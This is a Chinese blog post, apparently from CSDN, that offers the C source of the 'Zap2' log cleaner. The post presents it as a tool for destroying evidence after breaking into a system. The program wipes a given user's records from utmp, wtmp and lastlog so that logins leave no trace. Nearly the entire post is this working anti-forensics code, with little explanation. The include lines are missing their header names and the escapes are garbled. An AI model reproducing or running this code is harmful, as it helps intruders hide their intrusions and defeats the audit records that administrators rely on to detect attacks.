关闭

破坏入侵系统后现场的源码

标签: structkillnull
691人阅读 评论(0) 收藏 举报

编辑 /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog.

请使用专门的编辑器

例子:


#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"


int f;


void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

 

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

 

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

 

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

 

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

 

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

 

if ((pwd=getpwnam(who))!=NULL) {

 

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

 

} else printf("%s: ?/n",who);
}

 

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!/n");
} else
printf("Error./n");
}

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:49613次
    • 积分:715
    • 等级:
    • 排名:千里之外
    • 原创:20篇
    • 转载:19篇
    • 译文:0篇
    • 评论:3条
    文章分类
    文章存档
    最新评论